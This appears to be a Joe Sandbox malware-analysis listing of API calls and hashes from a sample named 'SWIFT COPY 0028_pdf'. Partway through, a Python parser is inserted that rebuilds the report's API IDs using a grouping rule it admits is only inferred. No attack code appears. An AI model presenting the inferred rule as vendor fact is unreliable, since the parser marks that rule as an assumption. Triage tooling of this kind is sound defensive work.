                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                    • String ID: static
                                                                                    • API String ID: 2559357485-2160076837
                                                                                    • Opcode ID: 3cdd9e988a777038ea598b3dfd4e2d7bc2573ecda2784e613a2f55d32f782e80
                                                                                    • Instruction ID: ecd0a41f5edffdd726080fe7d0bd40dc5798177feaddf8769c09d05c730f5108
                                                                                    • Opcode Fuzzy Hash: 3cdd9e988a777038ea598b3dfd4e2d7bc2573ecda2784e613a2f55d32f782e80
                                                                                    • Instruction Fuzzy Hash: BD317E31115115BBEF21AFA4DC49FEA3B6DFF0E760F100215FA2AA61A0C735D811EBA5
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                    • String ID: 0.0.0.0
                                                                                    • API String ID: 2620052-3771769585
                                                                                    • Opcode ID: 9ef3e5a0575a8c307fdd60573401444b7b2a9f00ac0129ee75ab36b206b78a43
                                                                                    • Instruction ID: f70eef9192b425e5f40fb51e5430fef54032feb9071e9a4bb205a73de11147a4
                                                                                    • Opcode Fuzzy Hash: 9ef3e5a0575a8c307fdd60573401444b7b2a9f00ac0129ee75ab36b206b78a43
                                                                                    • Instruction Fuzzy Hash: 4511E971908215AFDB24AB70EC4AFDA77BCEF85714F000069F14AA6091FF74DE859B91
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00945047
                                                                                      • Part of subcall function 00947C0E: __getptd_noexit.LIBCMT ref: 00947C0E
                                                                                    • __gmtime64_s.LIBCMT ref: 009450E0
                                                                                    • __gmtime64_s.LIBCMT ref: 00945116
                                                                                    • __gmtime64_s.LIBCMT ref: 00945133
                                                                                    • __allrem.LIBCMT ref: 00945189
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009451A5
                                                                                    • __allrem.LIBCMT ref: 009451BC
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009451DA
                                                                                    • __allrem.LIBCMT ref: 009451F1
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0094520F
                                                                                    • __invoke_watson.LIBCMT ref: 00945280
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                    • String ID:
                                                                                    • API String ID: 384356119-0
                                                                                    • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                    • Instruction ID: 6bec393a8527019fa74d648322aebfb403d15e0659f25d87fedb83e0e60f7af5
                                                                                    • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                    • Instruction Fuzzy Hash: 7571F676A00F16ABE714DFB9CC41F6AB3A8AF45764F15422AF914D6282E770DD408BD0
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00964DF8
                                                                                    • GetMenuItemInfoW.USER32(009E1708,000000FF,00000000,00000030), ref: 00964E59
                                                                                    • SetMenuItemInfoW.USER32(009E1708,00000004,00000000,00000030), ref: 00964E8F
                                                                                    • Sleep.KERNEL32(000001F4), ref: 00964EA1
                                                                                    • GetMenuItemCount.USER32(?), ref: 00964EE5
                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00964F01
                                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00964F2B
                                                                                    • GetMenuItemID.USER32(?,?), ref: 00964F70
                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00964FB6
                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00964FCA
                                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00964FEB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                    • String ID:
                                                                                    • API String ID: 4176008265-0
                                                                                    • Opcode ID: 76fedd87c9fa7ada16c16944583038ddca0b0b780b8bb1efc3eead3c220ad31d
                                                                                    • Instruction ID: 0018758ecb2d11ac8570a1c9bde33acbbb5177853f623c586a63f47911667fe6
                                                                                    • Opcode Fuzzy Hash: 76fedd87c9fa7ada16c16944583038ddca0b0b780b8bb1efc3eead3c220ad31d
                                                                                    • Instruction Fuzzy Hash: 56619BB1A14289EFDB21CFE4DC88EAE7BB8FB41308F140459F842A7251E731AD45DB60
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00989C98
                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00989C9B
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00989CBF
                                                                                    • _memset.LIBCMT ref: 00989CD0
                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00989CE2
                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00989D5A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$LongWindow_memset
                                                                                    • String ID:
                                                                                    • API String ID: 830647256-0
                                                                                    • Opcode ID: 0af0496efc2eaa3bdd2804be8c1bb2ac96e2979abb04997174e2d04a1a3070d7
                                                                                    • Instruction ID: 7fdac005471fb3f33aed245a3d1d33302e11de18fa9b45a87f1078f9e3a9e083
                                                                                    • Opcode Fuzzy Hash: 0af0496efc2eaa3bdd2804be8c1bb2ac96e2979abb04997174e2d04a1a3070d7
                                                                                    • Instruction Fuzzy Hash: 1E616875900248AFDB11DFA8CC81EFEB7B8EB49704F14415AFA05AB392D774AD41DB50
                                                                                    APIs
                                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 009594FE
                                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00959549
                                                                                    • VariantInit.OLEAUT32(?), ref: 0095955B
                                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 0095957B
                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 009595BE
                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 009595D2
                                                                                    • VariantClear.OLEAUT32(?), ref: 009595E7
                                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 009595F4
                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009595FD
                                                                                    • VariantClear.OLEAUT32(?), ref: 0095960F
                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0095961A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                    • String ID:
                                                                                    • API String ID: 2706829360-0
                                                                                    • Opcode ID: 84f9d296aaa44c5564574e2165fd1d6a06921a540c67924a6137cf97c08240c3
                                                                                    • Instruction ID: 1fc9b15e93241a8f4ceebee2101fe2bd72e5779e8d9385b5b2553e0de4a3cf02
                                                                                    • Opcode Fuzzy Hash: 84f9d296aaa44c5564574e2165fd1d6a06921a540c67924a6137cf97c08240c3
                                                                                    • Instruction Fuzzy Hash: FB416E71905219EFDF01DFA4D8449DEBFB9FF49355F008065F902A3261DB30AA4ADBA0
                                                                                    APIs
                                                                                      • Part of subcall function 0092936C: __swprintf.LIBCMT ref: 009293AB
                                                                                      • Part of subcall function 0092936C: __itow.LIBCMT ref: 009293DF
                                                                                    • CoInitialize.OLE32 ref: 0097ADF6
                                                                                    • CoUninitialize.OLE32 ref: 0097AE01
                                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,009AD8FC,?), ref: 0097AE61
                                                                                    • IIDFromString.OLE32(?,?), ref: 0097AED4
                                                                                    • VariantInit.OLEAUT32(?), ref: 0097AF6E
                                                                                    • VariantClear.OLEAUT32(?), ref: 0097AFCF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                    • API String ID: 834269672-1287834457
                                                                                    • Opcode ID: 7c46ffc1b1336a572c86bda75849665b221668561403c640dbac27c966639914
                                                                                    • Instruction ID: 025dd984c0087c7fc57473c3714793f24e0e3852e9b7a98c4a52fa1fa5e88529
                                                                                    • Opcode Fuzzy Hash: 7c46ffc1b1336a572c86bda75849665b221668561403c640dbac27c966639914
                                                                                    • Instruction Fuzzy Hash: 71618C722083119FD710DF64D848B6EBBE8AFC9714F108919F98A9B291D774ED44CB93
                                                                                    APIs
                                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00978168
                                                                                    • inet_addr.WSOCK32(?,?,?), ref: 009781AD
                                                                                    • gethostbyname.WSOCK32(?), ref: 009781B9
                                                                                    • IcmpCreateFile.IPHLPAPI ref: 009781C7
                                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00978237
                                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0097824D
                                                                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 009782C2
                                                                                    • WSACleanup.WSOCK32 ref: 009782C8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                    • String ID: Ping
                                                                                    • API String ID: 1028309954-2246546115
                                                                                    • Opcode ID: 64808d82fc0a932c849b87b8297a1a9d870b638ba4a8f5fb90417276a16e08d4
                                                                                    • Instruction ID: 0ec381307c6048d4469581e3b281d5310f5a996f0c63fdaae8f051f2b429753b
                                                                                    • Opcode Fuzzy Hash: 64808d82fc0a932c849b87b8297a1a9d870b638ba4a8f5fb90417276a16e08d4
                                                                                    • Instruction Fuzzy Hash: BB51A432644700AFD710EF24DC49B2B77E8EF85751F048969F96AD72A1DB34E901DB41
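                                                                                    Added example, not Joe Sandbox code: a parser for the function entries in this listing that reads each entry's "APIs" lines and rebuilds the "API ID" summary the Similarity section shows. The grouping rule is inferred from the entries on this page and is an assumption rather than vendor documentation: split each API name on CamelCase boundaries, keep only tokens of at least four characters, count them over every listed call (subcall lines included), order tokens by frequency, ASCII-sort within a frequency group, and join groups with "$". The embedded excerpt is constructed from the Ping and COM entries on this page; the set of network modules used for triage is also an assumption.

```python
"""Parse Joe Sandbox IDA-plugin function entries and rebuild their API IDs.

Added example, not Joe Sandbox code. The API ID rule is inferred from the
entries on this page (an assumption, not vendor documentation): split each
API name on CamelCase boundaries, keep tokens of at least four characters,
count them over every listed call, most frequent tokens first, ASCII order
inside a frequency group, groups joined with '$'.
"""
import re
from collections import Counter

# Constructed excerpt in the report's own layout (bullets removed), copied
# from the Ping and COM function entries on this page.
REPORT_EXCERPT = """\
APIs
WSAStartup.WSOCK32(00000101,?), ref: 00978168
inet_addr.WSOCK32(?,?,?), ref: 009781AD
gethostbyname.WSOCK32(?), ref: 009781B9
IcmpCreateFile.IPHLPAPI ref: 009781C7
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00978237
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0097824D
IcmpCloseHandle.IPHLPAPI(00000000), ref: 009782C2
WSACleanup.WSOCK32 ref: 009782C8
Similarity
API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
APIs
Part of subcall function 0092936C: __swprintf.LIBCMT ref: 009293AB
Part of subcall function 0092936C: __itow.LIBCMT ref: 009293DF
CoInitialize.OLE32 ref: 0097ADF6
CoUninitialize.OLE32 ref: 0097AE01
CoCreateInstance.OLE32(?,00000000,00000017,009AD8FC,?), ref: 0097AE61
IIDFromString.OLE32(?,?), ref: 0097AED4
VariantInit.OLEAUT32(?), ref: 0097AF6E
VariantClear.OLEAUT32(?), ref: 0097AFCF
Similarity
API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
"""

# "Name.MODULE(args), ref: ADDR" or "Part of subcall function ADDR: Name.MODULE ref: ADDR"
CALL_LINE = re.compile(
    r"^(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\([^)]*\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})$"
)
# GetMenuItemInfoW -> Get Menu Item Info W; IIDFromString -> IID From String;
# all-lowercase names such as gethostbyname, inet_addr and _memset stay whole.
TOKEN = re.compile(r"[a-z_][a-z0-9_]*|[A-Z]+(?![a-z])|[A-Z][a-z0-9]*")
MIN_TOKEN_LEN = 4  # inferred: Get, Set, WSA, IID, Dlg, Ex, ID and W never appear in an API ID
# Assumed list of modules that make a function worth a second look during triage.
NETWORK_MODULES = {"WSOCK32", "WS2_32", "IPHLPAPI", "WININET", "WINHTTP"}


def parse_entries(text):
    """Split report text into entries: {'calls': [(name, module, ref)], 'api_id', 'strings'}."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("\u2022").strip()  # drop the report's bullet glyph
        if line == "APIs":
            cur = {"calls": [], "api_id": None, "strings": []}
            entries.append(cur)
        elif cur is None:
            continue
        elif line.startswith("API ID:"):
            cur["api_id"] = line[len("API ID:"):].strip()
        elif line.startswith("String ID:"):
            value = line[len("String ID:"):].strip()
            cur["strings"] = value.split("$") if value else []
        else:
            m = CALL_LINE.match(line)
            if m:
                cur["calls"].append((m["name"], m["module"], m["ref"]))
    return entries


def api_id(calls):
    """Rebuild the API ID string from a list of (name, module, ref) calls."""
    counts = Counter(
        tok
        for name, _module, _ref in calls
        for tok in TOKEN.findall(name)
        if len(tok) >= MIN_TOKEN_LEN
    )
    groups = {}
    for tok, n in counts.items():
        groups.setdefault(n, []).append(tok)
    # Highest frequency first; plain str sort gives ASCII order, so '_memset' follows 'Sleep'.
    return "$".join("".join(sorted(groups[n])) for n in sorted(groups, reverse=True))


def check_entries(entries):
    """Return (stated, recomputed) pairs that disagree; a non-empty list means a missed call or rule."""
    return [(e["api_id"], api_id(e["calls"])) for e in entries if api_id(e["calls"]) != e["api_id"]]


def network_entries(entries):
    """Entries that touch one of the assumed network modules."""
    return [e for e in entries if any(mod in NETWORK_MODULES for _n, mod, _r in e["calls"])]


if __name__ == "__main__":
    found = parse_entries(REPORT_EXCERPT)
    for e in found:
        status = "OK" if api_id(e["calls"]) == e["api_id"] else "MISMATCH"
        print(status, api_id(e["calls"]), e["strings"])
    print("network-capable entries:", len(network_entries(found)))
```

                                                                                    Run it over a saved copy of the full report to cluster functions by API ID across samples; any entry whose stated ID differs from the recomputed one points at a call line the parser did not match or a case the inferred rule does not cover, and is worth inspecting by hand rather than trusting the cluster.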
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00989E5B
                                                                                    • CreateMenu.USER32 ref: 00989E76
                                                                                    • SetMenu.USER32(?,00000000), ref: 00989E85
                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00989F12
                                                                                    • IsMenu.USER32(?), ref: 00989F28
                                                                                    • CreatePopupMenu.USER32 ref: 00989F32
                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00989F63
                                                                                    • DrawMenuBar.USER32 ref: 00989F71
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 176399719-4108050209
                                                                                    • Opcode ID: 08c30e983b8b4d82d93bff5360a13f3753fd57d4e2a46daf297e1cc6e4c862a0
                                                                                    • Instruction ID: 78883d823d9c69d0d9b8e3f6b555a0270a81ac1efaf6d3ab8050be932e25375c
                                                                                    • Opcode Fuzzy Hash: 08c30e983b8b4d82d93bff5360a13f3753fd57d4e2a46daf297e1cc6e4c862a0
                                                                                    • Instruction Fuzzy Hash: 09416A74A11205AFDB14EF64D984BEABBB9FF49314F184019FA46A7351D730AD10DF90
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0096E396
                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0096E40C
                                                                                    • GetLastError.KERNEL32 ref: 0096E416
                                                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 0096E483
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                    • API String ID: 4194297153-14809454
                                                                                    • Opcode ID: 7ab87a8493f470749dd0ec30aef93bb78f2962d3bd24abe610a111f1189cd5f5
                                                                                    • Instruction ID: 731d5e63e064a63134f83d87de46667b7d8d3415d74a4522e38e9ee129173299
                                                                                    • Opcode Fuzzy Hash: 7ab87a8493f470749dd0ec30aef93bb78f2962d3bd24abe610a111f1189cd5f5
                                                                                    • Instruction Fuzzy Hash: 35318439A44209AFDB01EF74D945BBDB7B8EF85304F14C426E906EB2A1DF70AA01D791
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0095B98C
                                                                                    • GetDlgCtrlID.USER32 ref: 0095B997
                                                                                    • GetParent.USER32 ref: 0095B9B3
                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0095B9B6
                                                                                    • GetDlgCtrlID.USER32(?), ref: 0095B9BF
                                                                                    • GetParent.USER32(?), ref: 0095B9DB
                                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 0095B9DE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CtrlParent
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 1383977212-1403004172
                                                                                    • Opcode ID: bf7b7c013dfb8c426c0e8c2a9181822cfca4368a6207c70e076fcd66b825713d
                                                                                    • Instruction ID: 1b76bf881d132936290a606348e7c2bb7ef77b67c44ac933b7857f45ebae67e8
                                                                                    • Opcode Fuzzy Hash: bf7b7c013dfb8c426c0e8c2a9181822cfca4368a6207c70e076fcd66b825713d
                                                                                    • Instruction Fuzzy Hash: BD21F5B4900104BFDB04EBA1DC96EFEBB78EF9A304F10411AFA52932E1DB745819DB60
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0095BA73
                                                                                    • GetDlgCtrlID.USER32 ref: 0095BA7E
                                                                                    • GetParent.USER32 ref: 0095BA9A
                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0095BA9D
                                                                                    • GetDlgCtrlID.USER32(?), ref: 0095BAA6
                                                                                    • GetParent.USER32(?), ref: 0095BAC2
                                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 0095BAC5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CtrlParent
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 1383977212-1403004172
                                                                                    • Opcode ID: c1c329ca46e4a1948a034137ad8c0801e5ea1150d21efe2b62dcb0fbcb121786
                                                                                    • Instruction ID: f0fd14313890477de2751e0c28306420e766cf14aa4072b7668b433ca4f7483b
                                                                                    • Opcode Fuzzy Hash: c1c329ca46e4a1948a034137ad8c0801e5ea1150d21efe2b62dcb0fbcb121786
                                                                                    • Instruction Fuzzy Hash: FE21C1B4940104BFDB04EB60CC85FFEB7B8EF85300F104016F95293195DB754819EB60
                                                                                    APIs
                                                                                    • GetParent.USER32 ref: 0095BAE3
                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 0095BAF8
                                                                                    • _wcscmp.LIBCMT ref: 0095BB0A
                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0095BB85
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
